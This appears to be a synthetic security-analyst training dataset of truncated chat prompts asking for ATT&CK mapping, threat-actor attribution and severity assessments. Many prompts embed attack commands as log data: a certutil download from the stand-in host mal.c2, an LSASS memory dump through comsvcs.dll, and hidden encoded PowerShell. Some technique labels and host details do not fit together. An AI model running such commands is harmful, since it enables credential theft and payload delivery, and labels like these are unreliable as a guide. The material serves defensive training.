messages
listlengths
2
2
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Scattered Spider] performed T1071.001 using LOLBin technique.\nProcess: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nData Source: PowerShell Logg...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Scattered Spider] performed T1003.001 using LOLBin technique.\nProcess: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Source: Azu...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1570 - Lateral Tool Transfer\nEvasion Methods: Base64, LOLBin, WMI\nProcess: rundll32.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc JABkACAALQBlAH....", "role": "user" }, ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1003.001\nTarget System: Amazon Linux 2 system (WIN-FIN-SRV-BN6SASLX5H)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Impact", "role": "user" }, { "content": "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1484.001\nTarget System: Amazon Linux 2 system (DB-ORACLE-14ER04D5TW)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Persistence", "role": "user" }, { "content"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1098.004 - SSH Authorized Keys\nEvasion Methods: Fileless, TLS, Base64\nProcess: mshta.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 2341 C:\\temp\\ls...", "role": "user" },...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1003.001 - OS Credential Dumping: LSASS Memory\nEvasion Methods: WMI, JA3 Spoof, LOLBin\nProcess: bitsadmin.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 3226 C:\\temp\\ls...", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1531\nTarget System: Ubuntu 22.04 system (EC2-INST-IJB7C0F1JN)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "cont...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1566.001 - Phishing: Spearphishing Attachment\nEvasion Methods: TLS, LOLBin, JA3 Spoof\nProcess: certutil.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2J...", "r...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1570\nTarget System: Windows Server 2022 system (APP-WEB-LCZL930QWE)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1570 - Lateral Tool Transfer\nEvasion Methods: JA3 Spoof, WMI, TLS\nProcess: rundll32.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", "role": "user" }, ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1531 using LOLBin technique.\nProcess: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1101 C:\\temp\\lsass.dmp full\nData Source: PowerShell Logging (DS0...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1003.001 - OS Credential Dumping: LSASS Memory\nEvasion Methods: Fileless, LOLBin, Base64\nProcess: wmic.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2J...", "ro...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1071.001\nTarget System: Windows 11 system (EC2-INST-S1AZV0R12J)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Impact", "role": "user" }, { "content": "Se...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1566.001 - Phishing: Spearphishing Attachment\nEvasion Methods: LOLBin, Base64, WMI\nProcess: mshta.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", "role": ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Scattered Spider] performed T1484.001 using LOLBin technique.\nProcess: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: W...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1484.001 - Domain Policy Modification: Group Policy Modification\nEvasion Methods: TLS, JA3 Spoof, Fileless\nProcess: bitsadmin.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc JABkA...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1531 - Cloud Service Hijack / Account Access Removal\nEvasion Methods: LOLBin, TLS, Base64\nProcess: cmstp.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", "...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1059.001 using fileless technique.\nProcess: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3220 C:\\temp\\lsass.dmp full\nData Source: PowerShell Loggi...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1531 using cloud-native technique.\nProcess: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nData Source: Sysmon ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [UNC4841] performed T1570 using encrypted C2 technique.\nProcess: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: Clou...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1003.001\nTarget System: Windows Server 2022 system (EC2-INST-SXYJS0BBEO)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Impact, Command and Control, Discovery", "role": "us...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1570 using encrypted C2 technique.\nProcess: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: Windows Se...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1059.001 using encrypted C2 technique.\nProcess: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Source: CloudTrail (...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1059.001 - PowerShell\nEvasion Methods: TLS, JA3 Spoof, LOLBin\nProcess: powershell.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 2086 C:\\temp\\ls...", "role": "user" }, ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1546.003 - Event Triggered Execution: WMI Event Subscription\nEvasion Methods: TLS, Base64, JA3 Spoof\nProcess: rundll32.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1059.001 - PowerShell\nEvasion Methods: JA3 Spoof, Base64, Fileless\nProcess: mshta.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFM...", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1071.001 - Web Protocols (HTTPS C2)\nEvasion Methods: Fileless, JA3 Spoof, LOLBin\nProcess: powershell.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 2265 C:\\temp\\ls...", "ro...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1098.004\nTarget System: Windows 11 system (WIN-FIN-SRV-1YPQP8451G)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Privilege Escalation", "role":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1071.001 - Web Protocols (HTTPS C2)\nEvasion Methods: Fileless, TLS, WMI\nProcess: rundll32.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 2672 C:\\temp\\ls...", "role": "user"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1059.001 - PowerShell\nEvasion Methods: WMI, TLS, JA3 Spoof\nProcess: mshta.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", "role": "user" }, { "con...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1098.004 using encrypted C2 technique.\nProcess: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nData Source: Win...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1546.003\nTarget System: Windows 11 system (DB-ORACLE-ENF64HX4W1)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1570\nTarget System: Windows Server 2022 system (WIN-FIN-SRV-TFFKNHB7ED)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Reconnaissance", "role": "us...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1570\nTarget System: Windows 11 system (APP-WEB-82NQQY4DHV)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "Severit...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1546.003 using fileless technique.\nProcess: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: Network Co...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1566.001 using cloud-native technique.\nProcess: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nData Source: Azure AD Sign-in Lo...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1570\nTarget System: Amazon Linux 2 system (IAM-ROLE-I68LZM2JKX)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Impact, Command and Control", "role": "user" }, { ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1484.001 using fileless technique.\nProcess: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2932 C:\\temp\\lsass.dmp full\nData Source: Network Connecti...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1531 - Cloud Service Hijack / Account Access Removal\nEvasion Methods: LOLBin, JA3 Spoof, TLS\nProcess: certutil.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1531\nTarget System: Windows 11 system (DB-ORACLE-LNJ8HJYYWY)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence, Privilege Escalation, Command and Control", "role":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1003.001 - OS Credential Dumping: LSASS Memory\nEvasion Methods: LOLBin, TLS, JA3 Spoof\nProcess: bitsadmin.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFM...", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1071.001\nTarget System: Amazon Linux 2 system (WIN-FIN-SRV-YFT8GMI5IZ)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Persistence", "role": "user" }, { "cont...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Lapsus$] performed T1531 using encrypted C2 technique.\nProcess: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: Windo...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1021.006\nTarget System: Windows 11 system (DB-ORACLE-0CFMEUEWMN)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Persistence", "role": "user" }, { ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Scattered Spider] performed T1570 using fileless technique.\nProcess: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source:...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1003.001\nTarget System: Windows Server 2022 system (APP-WEB-7IS3RJ6E18)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Lateral Movement, Reconnaissance", ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Volt Typhoon] performed T1546.003 using fileless technique.\nProcess: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Source: Sysmo...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1484.001\nTarget System: Amazon Linux 2 system (EC2-INST-NTQ75PII02)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Exfiltration, Privilege Escalation", ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [UNC4841] performed T1003.001 using cloud-native technique.\nProcess: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: C...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [UNC4841] performed T1566.001 using fileless technique.\nProcess: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: Powe...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [UNC4841] performed T1098.004 using fileless technique.\nProcess: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nData Source: Ne...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1570 using cloud-native technique.\nProcess: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3243 C:\\temp\\lsass.dmp full\nData Source: Network...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1570 - Lateral Tool Transfer\nEvasion Methods: TLS, Fileless, Base64\nProcess: bitsadmin.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", "role": "user" },...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1071.001 - Web Protocols (HTTPS C2)\nEvasion Methods: TLS, JA3 Spoof, WMI\nProcess: mshta.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", "role": "user" }...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1021.006\nTarget System: Windows 11 system (AZURE-VM-CK5CVKKSBF)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Initial Access", "role": "user" }, { "content"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1546.003 - Event Triggered Execution: WMI Event Subscription\nEvasion Methods: WMI, Fileless, JA3 Spoof\nProcess: cmstp.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 3249 C:\\temp...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1021.006 - Windows Remote Management\nEvasion Methods: WMI, LOLBin, Fileless\nProcess: cmstp.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 3101 C:\\temp\\ls...", "role": "user...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1531 - Cloud Service Hijack / Account Access Removal\nEvasion Methods: JA3 Spoof, TLS, WMI\nProcess: bitsadmin.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 3149 C:\\temp\\ls...",...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Volt Typhoon] performed T1546.003 using fileless technique.\nProcess: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3178 C:\\temp\\lsass.dmp full\nData Source: Sysmo...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Volt Typhoon] performed T1021.006 using cloud-native technique.\nProcess: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Source: Powe...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1098.004\nTarget System: Amazon Linux 2 system (DB-ORACLE-GZB87QG8KC)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Impact, Lateral Movement, Reconnaissance", "role": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1003.001 - OS Credential Dumping: LSASS Memory\nEvasion Methods: TLS, Base64, WMI\nProcess: cmstp.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", "role": "u...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1484.001\nTarget System: Windows Server 2022 system (IAM-ROLE-CKKNXFCZOH)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Discovery, Initial Access", "role": "us...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1098.004\nTarget System: Windows Server 2022 system (AZURE-VM-15J5MZZYOB)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Persistence, Execution, Defense Evasion", "role":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1003.001\nTarget System: Windows Server 2022 system (IAM-ROLE-PXGH4C4OUA)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Collection, Reconnaissance, Privilege Escalation...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1546.003 using LOLBin technique.\nProcess: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nData Source: Azure AD Sign-in L...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1484.001\nTarget System: Ubuntu 22.04 system (DB-ORACLE-U7M53BTTU0)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Exfiltration", "role": "user" }, { "conten...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1021.006 - Windows Remote Management\nEvasion Methods: WMI, LOLBin, Base64\nProcess: rundll32.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 1555 C:\\temp\\ls...", "role": "use...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1098.004\nTarget System: Windows 11 system (APP-WEB-N3Z0H8GAQK)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Impact, Execution, Collection", "role": "user" ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1566.001 - Phishing: Spearphishing Attachment\nEvasion Methods: Fileless, LOLBin, JA3 Spoof\nProcess: bitsadmin.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT41] performed T1003.001 using cloud-native technique.\nProcess: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nData Source: Network Connection (DS0...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Scattered Spider] performed T1021.006 using cloud-native technique.\nProcess: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Sour...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1484.001 using fileless technique.\nProcess: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source:...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1484.001 - Domain Policy Modification: Group Policy Modification\nEvasion Methods: LOLBin, Fileless, Base64\nProcess: powershell.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 3933...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1059.001\nTarget System: Windows 11 system (APP-WEB-6EPUTJJK3B)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Persistence", "role": "user" }, ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Scattered Spider] performed T1566.001 using encrypted C2 technique.\nProcess: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nData Source: CloudTrail (...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1531 - Cloud Service Hijack / Account Access Removal\nEvasion Methods: TLS, JA3 Spoof, Fileless\nProcess: rundll32.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc JABkACAALQBlAH.......
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT41] performed T1570 using fileless technique.\nProcess: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nData Source: Azure AD S...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1484.001 using fileless technique.\nProcess: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1900 C:\\temp\\lsass.dmp full\nData Source: PowerShell Lo...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1098.004 using fileless technique.\nProcess: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3885 C:\\temp\\lsass.dmp full\nData Source: PowerShell ...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Volt Typhoon] performed T1531 using encrypted C2 technique.\nProcess: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1071.001 - Web Protocols (HTTPS C2)\nEvasion Methods: WMI, TLS, JA3 Spoof\nProcess: powershell.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", "role": "user...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1098.004 using fileless technique.\nProcess: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Source: Network Conn...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [UNC4841] performed T1059.001 using cloud-native technique.\nProcess: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source:...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1484.001 using LOLBin technique.\nProcess: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: Sysmon (DS002...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1059.001\nTarget System: Ubuntu 22.04 system (WIN-FIN-SRV-C2JA8VBA10)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Collection", "role": "user"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1531 - Cloud Service Hijack / Account Access Removal\nEvasion Methods: Base64, LOLBin, TLS\nProcess: rundll32.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 962 C:\\temp\\lsa...", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1570 - Lateral Tool Transfer\nEvasion Methods: TLS, Base64, LOLBin\nProcess: certutil.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 770 C:\\temp\\lsa...", "role": "user" }, ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1531\nTarget System: Windows 11 system (AZURE-VM-RV749NZ10Y)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Exfiltration", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1570\nTarget System: Windows 11 system (WIN-FIN-SRV-1XYDMMXQAB)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Execution, Collection, Privilege Escalation", "role"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1059.001 - PowerShell\nEvasion Methods: TLS, Fileless, WMI\nProcess: wmic.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", "role": "user" }, { "conte...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1531 - Cloud Service Hijack / Account Access Removal\nEvasion Methods: LOLBin, TLS, Fileless\nProcess: powershell.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 552 C:\\temp\\lsa.....
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1570 - Lateral Tool Transfer\nEvasion Methods: JA3 Spoof, Base64, Fileless\nProcess: powershell.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...", "role": "use...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1021.006\nTarget System: Windows Server 2022 system (EC2-INST-S0M388NH06)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Privilege Escalation", "role...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1566.001\nTarget System: Windows Server 2022 system (AZURE-VM-IBD5IWFZV6)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Exfiltration, Impact", "rol...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1071.001 using LOLBin technique.\nProcess: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3996 C:\\temp\\lsass.dmp full\nData Source: Sysmon (DS002...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1071.001\nTarget System: Amazon Linux 2 system (AZURE-VM-EEFMQSGGZR)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Execution", "role": "user" }, { "content":...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1566.001 using fileless technique.\nProcess: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1402 C:\\temp\\lsass.dmp full\nData Source: Sysmon (DS0...
[ { "content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1098.004 using encrypted C2 technique.\nProcess: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Source: PowerShe...